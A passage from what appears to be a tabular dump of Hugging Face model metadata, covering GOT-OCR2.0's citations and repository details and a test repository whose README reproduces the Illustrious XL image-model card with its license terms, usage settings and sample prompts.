author={Wei, Haoran and Liu, Chenglong and Chen, Jinyue and Wang, Jia and Kong, Lingyu and Xu, Yanming and Ge, Zheng and Zhao, Liang and Sun, Jianjian and Peng, Yuang and others},
|
| 93 |
+
journal={arXiv preprint arXiv:2409.01704},
|
| 94 |
+
year={2024}
|
| 95 |
+
}
|
| 96 |
+
@article{liu2024focus,
|
| 97 |
+
title={Focus Anywhere for Fine-grained Multi-page Document Understanding},
|
| 98 |
+
author={Liu, Chenglong and Wei, Haoran and Chen, Jinyue and Kong, Lingyu and Ge, Zheng and Zhu, Zining and Zhao, Liang and Sun, Jianjian and Han, Chunrui and Zhang, Xiangyu},
|
| 99 |
+
journal={arXiv preprint arXiv:2405.14295},
|
| 100 |
+
year={2024}
|
| 101 |
+
}
|
| 102 |
+
@article{wei2023vary,
|
| 103 |
+
title={Vary: Scaling up the Vision Vocabulary for Large Vision-Language Models},
|
| 104 |
+
author={Wei, Haoran and Kong, Lingyu and Chen, Jinyue and Zhao, Liang and Ge, Zheng and Yang, Jinrong and Sun, Jianjian and Han, Chunrui and Zhang, Xiangyu},
|
| 105 |
+
journal={arXiv preprint arXiv:2312.06109},
|
| 106 |
+
year={2023}
|
| 107 |
+
}
|
| 108 |
+
```","{""id"": ""stepfun-ai/GOT-OCR2_0"", ""author"": ""stepfun-ai"", ""sha"": ""979938bf89ccdc949c0131ddd3841e24578a4742"", ""last_modified"": ""2025-02-04 00:37:25+00:00"", ""created_at"": ""2024-09-12 16:02:28+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 99298, ""downloads_all_time"": null, ""likes"": 1458, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""GOT"", ""got"", ""vision-language"", ""ocr2.0"", ""custom_code"", ""image-text-to-text"", ""multilingual"", ""arxiv:2409.01704"", ""arxiv:2405.14295"", ""arxiv:2312.06109"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- multilingual\nlicense: apache-2.0\npipeline_tag: image-text-to-text\ntags:\n- got\n- vision-language\n- ocr2.0\n- custom_code"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""GOTQwenForCausalLM""], ""auto_map"": {""AutoConfig"": ""modeling_GOT.GOTConfig"", ""AutoModel"": ""modeling_GOT.GOTQwenForCausalLM""}, ""model_type"": ""GOT"", ""tokenizer_config"": {""pad_token"": ""<|endoftext|>""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/got_logo.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/got_support.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/train_sample.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='got_vision_b.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_GOT.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='qwen.tiktoken', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='render_tools.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenization_qwen.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""stepfun-ai/GOT_official_online_demo"", ""Tonic/GOT-OCR"", ""merve/vision_papers"", ""Tonic1/ImageEdit-GOT-OCR"", ""awacke1/TorchTransformers-CV-SFT"", ""Solo448/OCR_MULTILINGUAL-GOT"", ""omkar-surve126/Image-to-Text-Using-General-OCR-Theory"", ""awacke1/ImageToLineDrawingsWithVideo"", ""Kaballas/MinerU"", ""Mandi47/stepfun-ai-GOT-OCR2_0"", ""yashnd/ocr"", ""yashnd/stepfun-ai-GOT-OCR2_0"", ""srikar-v05/Simple_image_search_using_GOT_OCR_2.0"", ""sfsfee/smithiooou"", ""sfsfee/fdgdhfdgh"", ""sfsfee/Streamlit"", ""akhil-vaidya/GOT-OCR"", ""UniquePratham/DualTextOCRFusion"", ""aliarmaghan78/GOT-OCR-Model"", ""Satvik-ai/Scan_Master"", ""khaled06/ocr_to_text"", ""ppaihack/space1"", ""SansG2003/GOT_OCR2.0"", ""SansG2003/OCR2.0_GOT"", ""vrh15/OCR_and_Document_Search_Web_Application"", ""Vinay15/OCR_and_Document_Search_Web_Application"", ""ChinmoyDutta/OCR_demo"", ""Divyansh12/OCR_Application"", ""DeepDiveDev/OCR"", ""shivamAttarkar/OCR"", ""aarishshahmohsin/ocr_gradio"", ""omvishesh/OCR-app"", 
""justin4602/ocr"", ""ilovetensor/snap-assist"", ""Rashi123/TEXT_OCR"", ""TheKnight115/T5_final_project"", ""harshasatyavardhan/mahesh"", ""khaled06/ocr_summarization_and_question_answering"", ""yashbyname/OCR_using_GOT_and_Tesseract"", ""lithish2602/OCR_GOT_2.0_MODEL"", ""Vinay15/OCR"", ""hackK/Ocr"", ""coolfrxcrazy/YOLO_MODEL_DETECTION"", ""SanyaAhmed/OCR-Document-Search"", ""Nekorise/nekoSp"", ""thinler/GOTOCR"", ""Zienab/ocr-2"", ""Zienab/ocr-3"", ""artglobal/GOT_official_online_demo"", ""mashaelalbu/ocrsensitive"", ""artglobal/got_ocr_test"", ""suppg02/stepfun-ai-GOT-OCR2_0"", ""suppg02/stepfun-ai-GOT-OCR2_01"", ""alexneakameni/card_id_counter"", ""MahmoudAbdelmaged/GOT"", ""Spanicin/pdfextraction"", ""JabriA/OCR"", ""mohammedRiad/got-ocr-api""], ""safetensors"": {""parameters"": {""BF16"": 716033280}, ""total"": 716033280}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-04 00:37:25+00:00"", ""cardData"": ""language:\n- multilingual\nlicense: apache-2.0\npipeline_tag: image-text-to-text\ntags:\n- got\n- vision-language\n- ocr2.0\n- custom_code"", ""transformersInfo"": null, ""_id"": ""66e310947b8ce2359ed82126"", ""modelId"": ""stepfun-ai/GOT-OCR2_0"", ""usedStorage"": 1432126851}",0,"https://huggingface.co/justmywyw/testModel, https://huggingface.co/pranavdaware/web_ocr, https://huggingface.co/LuoKinging/learning-1",3,"https://huggingface.co/katphlab/got-ocr2-latex, https://huggingface.co/Effectz-AI/GOT-OCR2_0_Invoice_MD",2,https://huggingface.co/can-gaa-hou/GOT-OCR2.0-OpenVINO-INT4,1,,0,"MahmoudAbdelmaged/GOT, Rashi123/TEXT_OCR, Solo448/OCR_MULTILINGUAL-GOT, Tonic/GOT-OCR, UniquePratham/DualTextOCRFusion, akhil-vaidya/GOT-OCR, awacke1/TorchTransformers-CV-SFT, huggingface/InferenceSupport/discussions/181, mashaelalbu/ocrsensitive, merve/vision_papers, omkar-surve126/Image-to-Text-Using-General-OCR-Theory, suppg02/stepfun-ai-GOT-OCR2_01, ucaslcl/GOT_online, yashbyname/OCR_using_GOT_and_Tesseract",14
|
| 109 |
+
justmywyw/testModel,"---
|
| 110 |
+
license_link: https://freedevproject.org/faipl-1.0-sd/
|
| 111 |
+
tags:
|
| 112 |
+
- tag
|
| 113 |
+
- '1234'
|
| 114 |
+
dd: 1
|
| 115 |
+
language:
|
| 116 |
+
- en
|
| 117 |
+
- cn
|
| 118 |
+
- zh
|
| 119 |
+
base_model: stepfun-ai/GOT-OCR2_0
|
| 120 |
+
pipeline_tag: image-to-text
|
| 121 |
+
library_name: diffusers
|
| 122 |
+
metrics:
|
| 123 |
+
- accuracy
|
| 124 |
+
---
|
| 125 |
+
<style>
|
| 126 |
+
@import url('https://fonts.googleapis.com/css2?family=Montserrat&family=Playwrite+DE+Grund:wght@100..400&display=swap');
|
| 127 |
+
.title-container {
|
| 128 |
+
display: flex;
|
| 129 |
+
justify-content: center;
|
| 130 |
+
align-items: center;
|
| 131 |
+
height: 20vh;
|
| 132 |
+
}
|
| 133 |
+
/* Title Base Styling */
|
| 134 |
+
.title {
|
| 135 |
+
text-align: center;
|
| 136 |
+
letter-spacing: -0.02em;
|
| 137 |
+
line-height: 1.2;
|
| 138 |
+
padding: 0.5em 0;
|
| 139 |
+
}
|
| 140 |
+
.playwrite-de-grund-title {
|
| 141 |
+
font-size: 40px;
|
| 142 |
+
font-style: normal; /* You can change to italic if needed */
|
| 143 |
+
color: black;
|
| 144 |
+
}
|
| 145 |
+
@keyframes titlePulse {
|
| 146 |
+
0% { transform: scale(1); }
|
| 147 |
+
100% { transform: scale(1.05); }
|
| 148 |
+
}
|
| 149 |
+
.custom-table {
|
| 150 |
+
table-layout: fixed;
|
| 151 |
+
width: 100%;
|
| 152 |
+
border-collapse: separate;
|
| 153 |
+
border-spacing: 1em;
|
| 154 |
+
margin-top: 2em;
|
| 155 |
+
}
|
| 156 |
+
.custom-table td {
|
| 157 |
+
width: 33.333%;
|
| 158 |
+
vertical-align: top;
|
| 159 |
+
padding: 0;
|
| 160 |
+
}
|
| 161 |
+
.custom-image-container {
|
| 162 |
+
position: relative;
|
| 163 |
+
width: 100%;
|
| 164 |
+
height: 100%;
|
| 165 |
+
margin-bottom: 1em;
|
| 166 |
+
overflow: hidden;
|
| 167 |
+
align-items: center;
|
| 168 |
+
border-radius: 15px;
|
| 169 |
+
box-shadow: 0 10px 20px rgba(0, 0, 0, 0.3);
|
| 170 |
+
transition: all 0.3s ease;
|
| 171 |
+
}
|
| 172 |
+
.custom-image-container:hover {
|
| 173 |
+
transform: translateY(-10px);
|
| 174 |
+
box-shadow: 0 15px 30px rgba(0, 0, 0, 0.4);
|
| 175 |
+
}
|
| 176 |
+
.custom-image {
|
| 177 |
+
width: 100%;
|
| 178 |
+
height: auto;
|
| 179 |
+
object-fit: cover;
|
| 180 |
+
transition: transform 0.5s;
|
| 181 |
+
}
|
| 182 |
+
.last-image-container {
|
| 183 |
+
display: grid;
|
| 184 |
+
grid-template-columns: 1fr; /* One column for vertical layout */
|
| 185 |
+
gap: 0px; /* Remove space between images */
|
| 186 |
+
width: 80%; /* Adjust as needed */
|
| 187 |
+
height: 100%; /* Set full height */
|
| 188 |
+
}
|
| 189 |
+
.last-image-container img {
|
| 190 |
+
width: 100%; /* Full width for each image */
|
| 191 |
+
height: auto; /* Maintain aspect ratio */
|
| 192 |
+
}
|
| 193 |
+
.custom-image-container:hover .custom-image {
|
| 194 |
+
transform: scale(1.1);
|
| 195 |
+
}
|
| 196 |
+
.playwrite-de-grund-title .company-name {
|
| 197 |
+
font-size: 40px;
|
| 198 |
+
}
|
| 199 |
+
.nsfw-filter {
|
| 200 |
+
filter: blur(10px);
|
| 201 |
+
transition: filter 0.3s ease;
|
| 202 |
+
}
|
| 203 |
+
.custom-image-container:hover .nsfw-filter {
|
| 204 |
+
filter: blur(5px);
|
| 205 |
+
}
|
| 206 |
+
.overlay {
|
| 207 |
+
position: absolute;
|
| 208 |
+
top: 0;
|
| 209 |
+
left: 0;
|
| 210 |
+
right: 0;
|
| 211 |
+
bottom: 0;
|
| 212 |
+
background: rgba(0, 0, 0, 0.7);
|
| 213 |
+
display: flex;
|
| 214 |
+
flex-direction: column;
|
| 215 |
+
justify-content: center;
|
| 216 |
+
align-items: center;
|
| 217 |
+
opacity: 0;
|
| 218 |
+
transition: opacity 0.3s;
|
| 219 |
+
}
|
| 220 |
+
.custom-image-container:hover .overlay {
|
| 221 |
+
opacity: 1;
|
| 222 |
+
}
|
| 223 |
+
.overlay-text {
|
| 224 |
+
font-size: 1.5em;
|
| 225 |
+
font-weight: bold;
|
| 226 |
+
color: #FFFFFF;
|
| 227 |
+
text-align: center;
|
| 228 |
+
padding: 0.5em;
|
| 229 |
+
background: linear-gradient(45deg, #E74C3C, #C0392B);
|
| 230 |
+
-webkit-background-clip: text;
|
| 231 |
+
-webkit-text-fill-color: transparent;
|
| 232 |
+
text-shadow: 3px 3px 6px rgba(0, 0, 0, 0.7);
|
| 233 |
+
}
|
| 234 |
+
.overlay-subtext {
|
| 235 |
+
font-size: 0.85em;
|
| 236 |
+
color: #F0F0F0;
|
| 237 |
+
margin-top: 0.5em;
|
| 238 |
+
font-style: italic;
|
| 239 |
+
text-shadow: 3px 3px 6px rgba(0, 0, 0, 0.5);
|
| 240 |
+
}
|
| 241 |
+
.model-info {
|
| 242 |
+
font-style: bold;
|
| 243 |
+
}
|
| 244 |
+
@media (max-width: 768px) {
|
| 245 |
+
.title {
|
| 246 |
+
font-size: 3rem;
|
| 247 |
+
}
|
| 248 |
+
.custom-table td {
|
| 249 |
+
display: block;
|
| 250 |
+
width: 70%;
|
| 251 |
+
}
|
| 252 |
+
}
|
| 253 |
+
.playwrite-de-grund-title .trained-by {
|
| 254 |
+
font-size: 32px; /* Smaller font size for ""trained by"" part */
|
| 255 |
+
}
|
| 256 |
+
</style>
|
| 257 |
+
<head>
|
| 258 |
+
<link
|
| 259 |
+
rel=""stylesheet""
|
| 260 |
+
href=""https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.8.2/css/all.min.css""
|
| 261 |
+
/>
|
| 262 |
+
</head>
|
| 263 |
+
<body>
|
| 264 |
+
<div class=""title-container"">
|
| 265 |
+
<h1 class=""title"">
|
| 266 |
+
<i class=""fa-thin fa-palette""></i>
|
| 267 |
+
<span class=""playwrite-de-grund-title""><b>Illustrious XL v0.1</b><br> <span class=""trained-by"">trained by</span> <a rel=""nofollow"" href=""https://onomaai.com/""><b><span class=""company-name"">Onoma AI</span></b></a></span>
|
| 268 |
+
</h1>
|
| 269 |
+
</div>
|
| 270 |
+
<table class=""custom-table"">
|
| 271 |
+
<tr>
|
| 272 |
+
<td>
|
| 273 |
+
<div class=""custom-image-container"">
|
| 274 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/dXvGxUKjcsqzt_gDWc9FU.png"" alt=""s00"">
|
| 275 |
+
</div>
|
| 276 |
+
<div class=""custom-image-container"">
|
| 277 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/TjfHgNIgpfhX1Josy-a1h.png"" alt=""s01"">
|
| 278 |
+
</div>
|
| 279 |
+
<div class=""custom-image-container"">
|
| 280 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/YMxjs05WcbuS5sIjeqOJr.png"" alt=""s02"">
|
| 281 |
+
</div>
|
| 282 |
+
</td>
|
| 283 |
+
<td>
|
| 284 |
+
<div class=""custom-image-container"">
|
| 285 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/ChTQ2UKphqbFsyKF9ddNY.png"" alt=""s10"">
|
| 286 |
+
</div>
|
| 287 |
+
<div class=""custom-image-container"">
|
| 288 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/PO3_B7AeUVq59OWHidEas.png"" alt=""s11"">
|
| 289 |
+
</div>
|
| 290 |
+
<div class=""custom-image-container"">
|
| 291 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/hLR6af7AluIYQPB6GXQYh.png"" alt=""s12"">
|
| 292 |
+
</div>
|
| 293 |
+
</td>
|
| 294 |
+
<td>
|
| 295 |
+
<div class=""custom-image-container"">
|
| 296 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/4kdzhZAGp_VLEqat6T5Yv.png"" alt=""s20"">
|
| 297 |
+
</div>
|
| 298 |
+
<div class=""custom-image-container"">
|
| 299 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/05bgqY-9S2dNxtpa6WmNV.png"" alt=""s21"">
|
| 300 |
+
</div>
|
| 301 |
+
<div class=""custom-image-container"">
|
| 302 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/yAYxcQ1IK_dytlPGObMe4.png"" alt=""s22"">
|
| 303 |
+
</div>
|
| 304 |
+
</td>
|
| 305 |
+
</tr>
|
| 306 |
+
</table>
|
| 307 |
+
|
| 308 |
+
<div>
|
| 309 |
+
<p>
|
| 310 |
+
Illustrious XL is an illustration-focused Stable Diffusion XL model, continued from Kohaku XL Beta 5 and trained by the OnomaAI Research Team.
|
| 311 |
+
The model focuses on utilizing the large-scale annotated dataset <a href=""https://huggingface.co/datasets/nyanko7/danbooru2023"">Danbooru2023</a>.
|
| 312 |
+
We release the v0.1 and v0.1-GUIDED models here under the Fair AI Public License; however, we discourage the use of the model for monetization or any closed-source purposes.
|
| 313 |
+
For full technical details, please refer to our technical report.
|
| 314 |
+
</p>
|
| 315 |
+
<p>
|
| 316 |
+
<strong>Model Information:</strong>
|
| 317 |
+
</p>
|
| 318 |
+
<ul style=""margin-left: 20px;"">
|
| 319 |
+
<li><strong>Name:</strong> Illustrious-XL-v0.1</li>
|
| 320 |
+
<li><strong>Model Type:</strong> Stable Diffusion XL Model</li>
|
| 321 |
+
<li><strong>Dataset:</strong> Fine-tuned on Danbooru2023 Dataset</li>
|
| 322 |
+
</ul>
|
| 323 |
+
<p>
|
| 324 |
+
<strong>Description</strong>:
|
| 325 |
+
</p>
|
| 326 |
+
<ul style=""margin-left: 20px;"">
|
| 327 |
+
<li><strong>Illustrious-XL</strong> is a powerful generative model series, fine-tuned on the comprehensive Danbooru2023 dataset and its variants. It includes a wide variety of character designs, styles, and artistic knowledge derived from the dataset, making it suitable for creative and artistic AI generation tasks.</li>
|
| 328 |
+
<li><strong>Illustrious-XL-v0.1</strong> is an untuned BASE model, which serves as a possible base for all future model variants. LoRAs / adapters can be trained on this model, ensuring future use cases. The model is for research purposes only, as it is not tuned for aesthetics / preferences.</li>
|
| 329 |
+
<li><strong>Illustrious-XL-v0.1-GUIDED</strong> is a minimally safety-controlled model, which is the better option for typical use cases.</li>
|
| 330 |
+
</ul>
|
| 331 |
+
We plan to release several aesthetic-finetuned model variants in the near future.
|
| 332 |
+
<p>
|
| 333 |
+
<strong>Technical Details:</strong>
|
| 334 |
+
</p>
|
| 335 |
+
<ul style=""margin-left: 20px;"">
|
| 336 |
+
<li> <a href=""https://arxiv.org/abs/2409.19946"" target=""_blank"">https://arxiv.org/abs/2409.19946</a> </li>
|
| 337 |
+
</ul>
|
| 338 |
+
<p>
|
| 339 |
+
<strong>Terms and Conditions:</strong>
|
| 340 |
+
</p>
|
| 341 |
+
<ul style=""margin-left: 20px;"">
|
| 342 |
+
<li>We recommend using the official repositories to prevent malicious attacks.</li>
|
| 343 |
+
<li>Users must agree to the LICENSE to use the model. As mentioned in the LICENSE, we take NO responsibility for generated results or possible variants.</li>
|
| 344 |
+
<li> <strong>As mentioned in LICENSE, users must NOT use the generated result for any prohibited purposes, including but not limited to:</strong></li>
|
| 345 |
+
<ul style=""margin-left: 20px;"">
|
| 346 |
+
<li><strong>Harmful or malicious activities</strong>: This includes harassment, threats, spreading misinformation, or any use intended to harm individuals or groups.</li>
|
| 347 |
+
<li><strong>Illegal activities</strong>: Using generated content to violate any applicable laws or regulations.</li>
|
| 348 |
+
<li><strong>Unethical, offensive content generation</strong>: Generating offensive, defamatory, or controversial content that violates ethical guidelines.</li>
|
| 349 |
+
</ul>
|
| 350 |
+
</ul>
|
| 351 |
+
By using this model, users agree to comply with the conditions outlined in the LICENSE and acknowledge responsibility for how they utilize the generated content.
|
| 352 |
+
<p>
|
| 353 |
+
<strong>Safety Control Recommendation:</strong>
|
| 354 |
+
</p>
|
| 355 |
+
<ul style=""margin-left: 20px;"">
|
| 356 |
+
<li>Generative models can occasionally produce unintended or harmful outputs.</li>
|
| 357 |
+
<li>To minimize this risk, it is strongly recommended to use the GUIDED model variant, which incorporates additional safety mechanisms for responsible content generation.</li>
|
| 358 |
+
<li>By choosing this variant, users can significantly reduce the likelihood of generating harmful or unintended content.</li>
|
| 359 |
+
<li>We plan to update GUIDED model variants and its methodologies, with extensive research.</li>
|
| 360 |
+
</ul>
|
| 361 |
+
<p>
|
| 362 |
+
<strong>Training/Merging Policy:</strong><br>
|
| 363 |
+
You may fine-tune, merge, or train LoRA based on this model. However, to foster an open-source community, you are required to:
|
| 364 |
+
</p>
|
| 365 |
+
<ul style=""margin-left: 20px;"">
|
| 366 |
+
<li>Openly share details of any derived models, including references to the original model licensed under the fair-ai-public-license.</li>
|
| 367 |
+
<li>Provide information on datasets and ""merge recipes"" used for fine-tuning or training.</li>
|
| 368 |
+
<li>Adhere to the <strong>fair-ai-public-license</strong>, ensuring that any derivative works are also open source.</li>
|
| 369 |
+
</ul>
|
| 370 |
+
<p>
|
| 371 |
+
<strong>Uploading / Generation Policy:</strong><br>
|
| 372 |
+
We do not restrict the upload or distribution of generation results, as we hold no rights to generated materials. This includes 'personally trained models / fine-tuned models / trained LoRA-related results'. However, we kindly ask you to publish the generation details, to foster open-source communities and research.
|
| 373 |
+
</p>
|
| 374 |
+
<p>
|
| 375 |
+
<strong>Monetization Prohibition:</strong>
|
| 376 |
+
<ul style=""margin-left: 20px;"">
|
| 377 |
+
<li>You are prohibited from monetizing any <strong>closed-source fine-tuned / merged model, which withholds the model's source code / weights and its usage from the public.</strong></li>
|
| 378 |
+
<li>As per the license, you must openly publish any derivative models and variants. This model is intended for open-source use, and all derivatives must follow the same principles.</li>
|
| 379 |
+
</ul>
|
| 380 |
+
</p>
|
| 381 |
+
<p>
|
| 382 |
+
<strong>Usage:</strong><br>
|
| 383 |
+
We do not recommend overusing critical composition tags such as 'close-up', 'upside-down', or 'cowboy shot', as they can conflict with one another and confuse the model, degrading results.<br>
|
| 384 |
+
Recommended sampling method: Euler a, Sampling Steps: 20–28, CFG: 5–7.5 (may vary based on use case).<br>
|
| 385 |
+
We suggest using suitable composition tags like ""upper body,"" ""cowboy shot,"" ""portrait,"" or ""full body"" depending on your use case.<br>
|
| 386 |
+
The model supports quality tags such as: ""worst quality,"" ""bad quality,"" ""average quality,"" ""good quality,"" ""best quality,"" and ""masterpiece (quality).""<br>
|
| 387 |
+
Note: The model does not have any default style; this is intended behavior for the base model. A short code sketch using the settings above follows.
|
| 388 |
+
</p>
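<p>
For reference, a minimal diffusers sketch using the recommended settings above. This is an illustrative example rather than official usage code: the repository id 'your-org/Illustrious-XL-v0.1' is a placeholder, and an SDXL-format checkpoint is assumed.
</p>

```python
# Minimal sketch, assuming an SDXL-format checkpoint; the repo id is a placeholder.
import torch
from diffusers import StableDiffusionXLPipeline, EulerAncestralDiscreteScheduler

pipe = StableDiffusionXLPipeline.from_pretrained(
    'your-org/Illustrious-XL-v0.1', torch_dtype=torch.float16).to('cuda')
# 'Euler a' corresponds to the Euler ancestral scheduler in diffusers.
pipe.scheduler = EulerAncestralDiscreteScheduler.from_config(pipe.scheduler.config)

image = pipe(
    '1girl, upper body, best quality, masterpiece',        # composition + quality tags
    negative_prompt='worst quality, bad quality, lowres',
    num_inference_steps=24,   # recommended range: 20-28
    guidance_scale=6.0,       # recommended CFG: 5-7.5
).images[0]
image.save('sample.png')
```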
|
| 389 |
+
<div class=""last-image-container"">
|
| 390 |
+
<img src=""https://cdn-uploads.huggingface.co/production/uploads/651d27e3a00c49c5e50c0653/RiStls1S26meeu8UV8wKj.png"" alt=""s23"">
|
| 391 |
+
<p><strong>Prompt:</strong><br>
|
| 392 |
+
1boy, holding knife, blue eyes, jewelry, jacket, shirt, open mouth, hand up, simple background, hair between eyes, vest, knife, tongue, holding weapon, grey vest, upper body, necktie, solo, looking at viewer, smile, pink blood, weapon, dagger, open clothes, collared shirt, blood on face, tongue out, blonde hair, holding dagger, red necktie, white shirt, blood, short hair, holding, earrings, long sleeves, black jacket, dark theme
|
| 393 |
+
</p>
|
| 394 |
+
<p><strong>Negative Prompt:</strong><br>
|
| 395 |
+
worst quality, comic, multiple views, bad quality, low quality, lowres, displeasing, very displeasing, bad anatomy, bad hands, scan artifacts, monochrome, greyscale, signature, twitter username, jpeg artifacts, 2koma, 4koma, guro, extra digits, fewer digits
|
| 396 |
+
</p>
|
| 397 |
+
<img src=""https://cdn-uploads.huggingface.co/production/uploads/63398de08f27255b6b50081a/2QgPFOXbu0W6XjAMvLryY.png"" alt=""s24"">
|
| 398 |
+
<p><strong>Prompt:</strong><br>
|
| 399 |
+
1girl, extremely dark, black theme, silhouette, rim lighting, black, looking at viewer, low contrast, masterpiece
|
| 400 |
+
</p>
|
| 401 |
+
<p><strong>Negative Prompt:</strong><br>
|
| 402 |
+
worst quality, comic, multiple views, bad quality, low quality, lowres, displeasing, very displeasing, bad anatomy, bad hands, scan artifacts, monochrome, greyscale, twitter username, jpeg artifacts, 2koma, 4koma, guro, extra digits, fewer digits, jaggy lines, unclear
|
| 403 |
+
</p>
|
| 404 |
+
</div>
|
| 405 |
+
|
| 406 |
+
</div>
|
| 407 |
+
</body>","{""id"": ""justmywyw/testModel"", ""author"": ""justmywyw"", ""sha"": ""d4b3ec46bdcb588fba2868cbde4e8a62fc75a6dd"", ""last_modified"": ""2025-03-13 10:46:44+00:00"", ""created_at"": ""2022-04-19 09:50:14+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""tag"", ""1234"", ""image-to-text"", ""en"", ""cn"", ""zh"", ""arxiv:2409.19946"", ""base_model:stepfun-ai/GOT-OCR2_0"", ""base_model:finetune:stepfun-ai/GOT-OCR2_0"", ""region:us""], ""pipeline_tag"": ""image-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: stepfun-ai/GOT-OCR2_0\nlanguage:\n- en\n- cn\n- zh\nlibrary_name: diffusers\nlicense_link: https://freedevproject.org/faipl-1.0-sd/\nmetrics:\n- accuracy\npipeline_tag: image-to-text\ntags:\n- tag\n- '1234'\ndd: 1"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='4607043b-59e6-489c-9196-57d07ae7be46 (2).mp4', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='4607043b-59e6-489c-9196-57d07ae7be46.mp4', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='QwQ32B.yml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='frame_generic_light.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='mmm.mp4', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='studio-cover_1bdfd4f9-c3d4-4347-a0f3-f45bb3a806bf.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='test/card.svg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='test/test', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='test1', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='testMd', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='undraw_Code_review_re_woeb', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='undraw_chatting_re_j55r', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='undraw_chatting_re_j55r.svg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='\u672a\u547d\u540d(1).png', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-13 10:46:44+00:00"", ""cardData"": ""base_model: stepfun-ai/GOT-OCR2_0\nlanguage:\n- en\n- cn\n- zh\nlibrary_name: diffusers\nlicense_link: https://freedevproject.org/faipl-1.0-sd/\nmetrics:\n- accuracy\npipeline_tag: image-to-text\ntags:\n- tag\n- '1234'\ndd: 1"", ""transformersInfo"": null, ""_id"": ""625e85d6b39793496f793ef3"", ""modelId"": ""justmywyw/testModel"", ""usedStorage"": 9021130}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=justmywyw/testModel&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bjustmywyw%2FtestModel%5D(%2Fjustmywyw%2FtestModel)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 408 |
+
pranavdaware/web_ocr,"
|
| 409 |
+
---
|
| 410 |
+
license: apache-2.0
|
| 411 |
+
language:
|
| 412 |
+
- hi
|
| 413 |
+
- en
|
| 414 |
+
metrics:
|
| 415 |
+
- accuracy
|
| 416 |
+
base_model:
|
| 417 |
+
- stepfun-ai/GOT-OCR2_0
|
| 418 |
+
pipeline_tag: image-to-text
|
| 419 |
+
